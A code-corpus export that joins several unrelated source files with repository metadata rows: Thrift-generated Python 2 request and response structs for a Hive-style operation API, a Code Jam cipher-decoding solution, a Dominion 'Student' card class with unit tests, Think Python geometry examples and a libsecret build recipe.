            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.operationHandle = TOperationHandle()
                    self.operationHandle.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('TCancelOperationReq')
        if self.operationHandle is not None:
            oprot.writeFieldBegin('operationHandle', TType.STRUCT, 1)
            self.operationHandle.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        if self.operationHandle is None:
            raise TProtocol.TProtocolException(message='Required field operationHandle is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.iteritems()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class TCancelOperationResp(object):
    # Thrift-generated response struct (Python 2); indentation restored.
    """
    Attributes:
     - status
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ),  # 1
    )

    def __init__(self, status=None,):
        self.status = status

    def read(self, iprot):
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.status = TStatus()
                    self.status.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('TCancelOperationResp')
        if self.status is not None:
            oprot.writeFieldBegin('status', TType.STRUCT, 1)
            self.status.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        if self.status is None:
            raise TProtocol.TProtocolException(message='Required field status is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.iteritems()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class TCloseOperationReq(object):
    # Thrift-generated request struct (Python 2); indentation restored.
    """
    Attributes:
     - operationHandle
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ),  # 1
    )

    def __init__(self, operationHandle=None,):
        self.operationHandle = operationHandle

    def read(self, iprot):
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.operationHandle = TOperationHandle()
                    self.operationHandle.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('TCloseOperationReq')
        if self.operationHandle is not None:
            oprot.writeFieldBegin('operationHandle', TType.STRUCT, 1)
            self.operationHandle.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        if self.operationHandle is None:
            raise TProtocol.TProtocolException(message='Required field operationHandle is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.iteritems()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class TCloseOperationResp(object):
    # Thrift-generated response struct (Python 2); indentation restored.
    """
    Attributes:
     - status
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ),  # 1
    )

    def __init__(self, status=None,):
        self.status = status

    def read(self, iprot):
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.status = TStatus()
                    self.status.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('TCloseOperationResp')
        if self.status is not None:
            oprot.writeFieldBegin('status', TType.STRUCT, 1)
            self.status.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        if self.status is None:
            raise TProtocol.TProtocolException(message='Required field status is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.iteritems()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class TGetResultSetMetadataReq(object):
    # Thrift-generated request struct (Python 2); indentation restored.
    """
    Attributes:
     - operationHandle
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ),  # 1
    )

    def __init__(self, operationHandle=None,):
        self.operationHandle = operationHandle

    def read(self, iprot):
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.operationHandle = TOperationHandle()
                    self.operationHandle.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('TGetResultSetMetadataReq')
        if self.operationHandle is not None:
            oprot.writeFieldBegin('operationHandle', TType.STRUCT, 1)
            self.operationHandle.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        if self.operationHandle is None:
            raise TProtocol.TProtocolException(message='Required field operationHandle is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.iteritems()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class TGetResultSetMetadataResp(object):
    # Thrift-generated response struct (Python 2); indentation restored.
    """
    Attributes:
     - status
     - schema
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ),  # 1
        (2, TType.STRUCT, 'schema', (TTableSchema, TTableSchema.thrift_spec), None, ),  # 2
    )

    def __init__(self, status=None, schema=None,):
        self.status = status
        self.schema = schema

    def read(self, iprot):
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.status = TStatus()
                    self.status.read(iprot)
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.STRUCT:
                    self.schema = TTableSchema()
                    self.schema.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('TGetResultSetMetadataResp')
        if self.status is not None:
            oprot.writeFieldBegin('status', TType.STRUCT, 1)
            self.status.write(oprot)
            oprot.writeFieldEnd()
        if self.schema is not None:
            oprot.writeFieldBegin('schema', TType.STRUCT, 2)
            self.schema.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        # Only `status` is required; schema is optional.
        if self.status is None:
            raise TProtocol.TProtocolException(message='Required field status is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.iteritems()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class TFetchResultsReq(object):
    # Thrift-generated request struct (Python 2); indentation restored.
    """
    Attributes:
     - operationHandle
     - orientation
     - maxRows
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ),  # 1
        (2, TType.I32, 'orientation', None, 0, ),  # 2
        (3, TType.I64, 'maxRows', None, None, ),  # 3
    )

    def __init__(self, operationHandle=None, orientation=thrift_spec[2][4], maxRows=None,):
        # `orientation` defaults to thrift_spec[2][4] == 0 (FETCH_NEXT).
        self.operationHandle = operationHandle
        self.orientation = orientation
        self.maxRows = maxRows

    def read(self, iprot):
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.operationHandle = TOperationHandle()
                    self.operationHandle.read(iprot)
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.I32:
                    self.orientation = iprot.readI32();
                else:
                    iprot.skip(ftype)
            elif fid == 3:
                if ftype == TType.I64:
                    self.maxRows = iprot.readI64();
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('TFetchResultsReq')
        if self.operationHandle is not None:
            oprot.writeFieldBegin('operationHandle', TType.STRUCT, 1)
            self.operationHandle.write(oprot)
            oprot.writeFieldEnd()
        if self.orientation is not None:
            oprot.writeFieldBegin('orientation', TType.I32, 2)
            oprot.writeI32(self.orientation)
            oprot.writeFieldEnd()
        if self.maxRows is not None:
            oprot.writeFieldBegin('maxRows', TType.I64, 3)
            oprot.writeI64(self.maxRows)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        # All three fields are required by the IDL.
        if self.operationHandle is None:
            raise TProtocol.TProtocolException(message='Required field operationHandle is unset!')
        if self.orientation is None:
            raise TProtocol.TProtocolException(message='Required field orientation is unset!')
        if self.maxRows is None:
            raise TProtocol.TProtocolException(message='Required field maxRows is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.iteritems()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class TFetchResultsResp(object):
    # Thrift-generated response struct (Python 2); indentation restored.
    """
    Attributes:
     - status
     - hasMoreRows
     - results
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ),  # 1
        (2, TType.BOOL, 'hasMoreRows', None, None, ),  # 2
        (3, TType.STRUCT, 'results', (TRowSet, TRowSet.thrift_spec), None, ),  # 3
    )

    def __init__(self, status=None, hasMoreRows=None, results=None,):
        self.status = status
        self.hasMoreRows = hasMoreRows
        self.results = results

    def read(self, iprot):
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.status = TStatus()
                    self.status.read(iprot)
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.BOOL:
                    self.hasMoreRows = iprot.readBool();
                else:
                    iprot.skip(ftype)
            elif fid == 3:
                if ftype == TType.STRUCT:
                    self.results = TRowSet()
                    self.results.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('TFetchResultsResp')
        if self.status is not None:
            oprot.writeFieldBegin('status', TType.STRUCT, 1)
            self.status.write(oprot)
            oprot.writeFieldEnd()
        if self.hasMoreRows is not None:
            oprot.writeFieldBegin('hasMoreRows', TType.BOOL, 2)
            oprot.writeBool(self.hasMoreRows)
            oprot.writeFieldEnd()
        if self.results is not None:
            oprot.writeFieldBegin('results', TType.STRUCT, 3)
            self.results.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        # Only `status` is required; hasMoreRows/results are optional.
        if self.status is None:
            raise TProtocol.TProtocolException(message='Required field status is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.iteritems()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class TGetLogReq(object):
    # Thrift-generated request struct (Python 2); indentation restored.
    """
    Attributes:
     - operationHandle
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'operationHandle', (TOperationHandle, TOperationHandle.thrift_spec), None, ),  # 1
    )

    def __init__(self, operationHandle=None,):
        self.operationHandle = operationHandle

    def read(self, iprot):
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.operationHandle = TOperationHandle()
                    self.operationHandle.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('TGetLogReq')
        if self.operationHandle is not None:
            oprot.writeFieldBegin('operationHandle', TType.STRUCT, 1)
            self.operationHandle.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        if self.operationHandle is None:
            raise TProtocol.TProtocolException(message='Required field operationHandle is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.iteritems()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
class TGetLogResp(object):
    # Thrift-generated response struct (Python 2); indentation restored.
    """
    Attributes:
     - status
     - log
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ),  # 1
        (2, TType.STRING, 'log', None, None, ),  # 2
    )

    def __init__(self, status=None, log=None,):
        self.status = status
        self.log = log

    def read(self, iprot):
        if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.status = TStatus()
                    self.status.read(iprot)
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.STRING:
                    self.log = iprot.readString();
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('TGetLogResp')
        if self.status is not None:
            oprot.writeFieldBegin('status', TType.STRUCT, 1)
            self.status.write(oprot)
            oprot.writeFieldEnd()
        if self.log is not None:
            oprot.writeFieldBegin('log', TType.STRING, 2)
            oprot.writeString(self.log)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        # Both fields are required by the IDL.
        if self.status is None:
            raise TProtocol.TProtocolException(message='Required field status is unset!')
        if self.log is None:
            raise TProtocol.TProtocolException(message='Required field log is unset!')
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.iteritems()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)
| [
"[email protected]"
] | |
59c65295bbf233c1466985d1aa33bafac20aa3fe | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_95/1152.py | a5a2f7fcec24d2ae43109115e3074698189fdd34 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,234 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
from string import ascii_lowercase
from pprint import pprint
import sys, os
# Known plaintext/ciphertext pair from the Code Jam "Speaking in Tongues"
# problem statement, used to derive the substitution cipher.  The sample text
# never contains 'q' or 'z', so those two mappings are seeded by hand
# ('q' -> 'z' is given in the problem; 'z' is deduced later).
sample_googlerese = """ejp mysljylc kd kxveddknmc re jsicpdrysi
rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd
de kr kd eoya kw aej tysr re ujdr lkgc jv
"""
sample_answer = """our language is impossible to understand
there are twenty six factorial possibilities
so it is okay if you want to just give up
"""

# googlerese char -> plain char; unknown letters start empty and are filled
# in by make_char_mapping().
char_map = dict()
for c in ascii_lowercase:
    char_map[c] = ""
char_map['q'] = 'z'
char_map[' '] = ' '
def make_char_mapping():
    """Populate the module-level char_map from the known sample pair.

    Aligns sample_answer with sample_googlerese character by character, then
    assigns the one letter never seen in the samples to 'z' (the only
    remaining unmapped googlerese letter).
    """
    for a, g in zip(sample_answer, sample_googlerese):
        if g in ascii_lowercase:
            char_map[g] = a
    # The single plain letter still missing from char_map's values must be
    # the decoding of 'z'.
    for c in ascii_lowercase:
        if not c in char_map.values():
            char_map['z'] = c
def decode(input_str):
    """Return input_str translated through the module-level char_map.

    Newlines are dropped; every other character must be a key of char_map
    (lowercase letters and space), otherwise a KeyError is raised.
    """
    output = list()
    for c in input_str:
        if not c == '\n':
            output.append(char_map[c])
    return ''.join(output)
if __name__ == "__main__":
make_char_mapping()
filename = sys.argv[1]
template = "Case #%d: %s"
with open(filename) as r:
casenum = int(r.readline())
for i in xrange(casenum):
input_str = r.readline()
print template % (i + 1, decode(input_str))
| [
"[email protected]"
] | |
77dcd58897fa39cc6326e1fc2178a0adc30ff87b | cbdef2e8ed259adc4653ade34db12d8bcc0cea9f | /dominion/cards/Wizard_Student.py | fa8a42e3234ec5e594f4503326b3c3dd61788893 | [] | no_license | dwagon/pydominion | 8dd5afef8ec89c63ade74c4ae6c7473cd676799f | 545709f0a41529de74f33aa83b106c456900fa5b | refs/heads/main | 2023-08-29T10:02:26.652032 | 2023-08-23T02:25:00 | 2023-08-23T02:25:00 | 18,776,204 | 1 | 0 | null | 2023-08-23T02:25:02 | 2014-04-14T20:49:28 | Python | UTF-8 | Python | false | false | 3,568 | py | #!/usr/bin/env python
import unittest
from dominion import Game, Card, Piles
###############################################################################
###############################################################################
class Card_Student(Card.Card):
    """The Student card from Dominion: Allies (Wizard rotating pile)."""

    def __init__(self):
        Card.Card.__init__(self)
        self.cardtype = [
            Card.CardType.ACTION,
            Card.CardType.WIZARD,  # pylint: disable=no-member
            Card.CardType.LIAISON,
        ]
        self.base = Card.CardExpansion.ALLIES
        self.cost = 3
        self.name = "Student"
        self.actions = 1
        self.desc = """+1 Action;
You may rotate the Wizards;
Trash a card from your hand. If it's a Treasure, +1 Favor and put this onto your deck."""

    def special(self, game, player):
        """Optionally rotate the Wizards, then trash a card from hand.

        If the trashed card is a Treasure: +1 Favor, and Student moves from
        the played area onto the top of the player's deck.
        """
        opt = player.plr_choose_options(
            "Do you want to rotate the Wizards?",
            ("Don't change", False),
            ("Rotate", True),
        )
        if opt:
            game["Wizards"].rotate()
        trashed = player.plr_trash_card(
            prompt="Pick a card to trash", num=1, force=True
        )
        if trashed and trashed[0].isTreasure():
            player.favors.add(1)
            player.piles[Piles.PLAYED].remove(self)
            player.add_card(self, "deck")
###############################################################################
class TestStudent(unittest.TestCase):
    """Unit tests for the Student card."""

    def setUp(self):
        # A one-player game with the Wizards rotating pile and Liaison support.
        self.g = Game.TestGame(numplayers=1, initcards=["Wizards"], use_liaisons=True)
        self.g.start_game()
        self.plr = self.g.player_list()[0]

    def test_play_trash_treas(self):
        """Play a student - don't rotate, but trash treasure"""
        while True:
            card = self.g["Wizards"].remove()
            if card.name == "Student":
                break
        self.plr.piles[Piles.HAND].set("Copper", "Silver", "Gold", "Estate")
        self.plr.add_card(card, Piles.HAND)
        self.plr.test_input = ["Don't change", "Trash Copper"]
        favors = self.plr.favors.get()
        self.plr.play_card(card)
        self.assertIn("Copper", self.g.trashpile)
        # Trashing a Treasure puts Student back on the deck and grants a favor.
        self.assertIn("Student", self.plr.piles[Piles.DECK])
        self.assertEqual(self.plr.favors.get(), favors + 1)

    def test_play_trash_non_treas(self):
        """Play a student - don't rotate, but trash a non treasure"""
        while True:
            card = self.g["Wizards"].remove()
            if card.name == "Student":
                break
        self.plr.piles[Piles.HAND].set("Copper", "Silver", "Gold", "Estate")
        self.plr.add_card(card, Piles.HAND)
        self.plr.test_input = ["Don't change", "Trash Estate"]
        favors = self.plr.favors.get()
        self.plr.play_card(card)
        self.assertIn("Estate", self.g.trashpile)
        # No Treasure trashed: Student stays out of the deck, no favor gained.
        self.assertNotIn("Student", self.plr.piles[Piles.DECK])
        self.assertEqual(self.plr.favors.get(), favors)

    def test_play_trash_rotate(self):
        """Play a student - rotate, and trash a non treasure"""
        while True:
            card = self.g["Wizards"].remove()
            if card.name == "Student":
                break
        self.plr.piles[Piles.HAND].set("Copper", "Silver", "Gold", "Estate")
        self.plr.add_card(card, Piles.HAND)
        self.plr.test_input = ["Rotate", "Trash Estate"]
        self.plr.play_card(card)
        # After rotating, the next card off the Wizards pile is Conjurer.
        card = self.g["Wizards"].remove()
        self.assertEqual(card.name, "Conjurer")
###############################################################################
# Run the unit tests when executed directly.
if __name__ == "__main__":  # pragma: no cover
    unittest.main()
# EOF
| [
"[email protected]"
] | |
01f32c1f857b3e6cb6206443d4778d3411fa38fa | 85de10a9467b3cd88ce83227bee0d71706e2c2b0 | /c15/point1.py | bcd93dd9a81cdd42b3999ae7c53212cba3aa9078 | [] | no_license | sreejithev/thinkpythonsolutions | f0bbfc0951e57e9b81f50aabf968860484081524 | 59481fd3d2976e73691a3fff97e083c336070cea | refs/heads/master | 2019-07-22T14:08:54.890004 | 2017-09-15T05:06:26 | 2017-09-15T05:06:26 | 94,759,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,480 | py | """
Code example from Think Python, by Allen B. Downey.
Available from http://thinkpython.com
Copyright 2012 Allen B. Downey.
Distributed under the GNU General Public License at gnu.org/licenses/gpl.html.
"""
class Point(object):
    """Represents a point in 2-D space.

    Attributes are assigned dynamically by callers: x, y (numbers).
    """
def print_point(p):
"""Print a Point object in human-readable format."""
print '(%g, %g)' % (p.x, p.y)
class Rectangle(object):
    """Represents a rectangle.

    attributes: width, height, corner (a Point at the lower-left).
    """
def find_center(rect):
    """Return a Point at the center of a Rectangle.

    rect: Rectangle with numeric width/height and a corner Point.
    """
    p = Point()
    p.x = rect.corner.x + rect.width / 2.0
    p.y = rect.corner.y + rect.height / 2.0
    return p
def grow_rectangle(rect, dwidth, dheight):
    """Modify the Rectangle in place by adding to its width and height.

    rect: Rectangle object.
    dwidth: change in width (can be negative).
    dheight: change in height (can be negative).
    """
    rect.width += dwidth
    rect.height += dheight
def main():
blank = Point()
blank.x = 3
blank.y = 4
print 'blank',
print_point(blank)
box = Rectangle()
box.width = 100.0
box.height = 200.0
box.corner = Point()
box.corner.x = 0.0
box.corner.y = 0.0
center = find_center(box)
print 'center',
print_point(center)
print box.width
print box.height
print 'grow'
grow_rectangle(box, 50, 100)
print box.width
print box.height
if __name__ == '__main__':
    main()
| [
"[email protected]"
] | |
d7a3715564bf502e8f7675515f39437fd16aea6d | 1adc05008f0caa9a81cc4fc3a737fcbcebb68995 | /hardhat/recipes/libsecret.py | b42a31342843ec94f44a8536408092b7348707ab | [
"MIT",
"BSD-3-Clause"
] | permissive | stangelandcl/hardhat | 4aa995518697d19b179c64751108963fa656cfca | 1ad0c5dec16728c0243023acb9594f435ef18f9c | refs/heads/master | 2021-01-11T17:19:41.988477 | 2019-03-22T22:18:44 | 2019-03-22T22:18:52 | 79,742,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 672 | py | from .base import GnuRecipe
class LibSecretRecipe(GnuRecipe):
    """Build recipe for GNOME libsecret (secret-service client library)."""

    def __init__(self, *args, **kwargs):
        super(LibSecretRecipe, self).__init__(*args, **kwargs)
        # SHA-256 of the upstream libsecret-0.18.5 tarball, split for line length.
        self.sha256 = '9ce7bd8dd5831f2786c935d82638ac42' \
                      '8fa085057cc6780aba0e39375887ccb3'
        self.name = 'libsecret'
        self.version = '0.18.5'
        self.version_regex = r'(?P<version>\d+\.\d+(\.\d+)?)'
        self.depends = ['gcrypt', 'glib', 'gobject-introspection', 'vala']
        # $short_version / $version are substituted by the recipe framework.
        self.url = 'http://ftp.gnome.org/pub/gnome/sources/libsecret/' \
                   '$short_version/libsecret-$version.tar.xz'
        self.configure_args += ['--enable-vala=no']
| [
"[email protected]"
] | |
da3f14eb4676c866d47a2784491765e6f5abcac8 | 0bbeb0bbe788ec5a8ba15acf159e4b913985bba4 | /tests/testsuite/a_basic/tests_03_networking.py | 5173cf96368f92efba523e5f790107970eeb035a | [
